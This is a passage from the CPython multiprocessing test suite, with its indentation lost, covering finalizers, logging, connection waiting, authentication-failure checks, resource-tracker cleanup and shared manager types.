util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
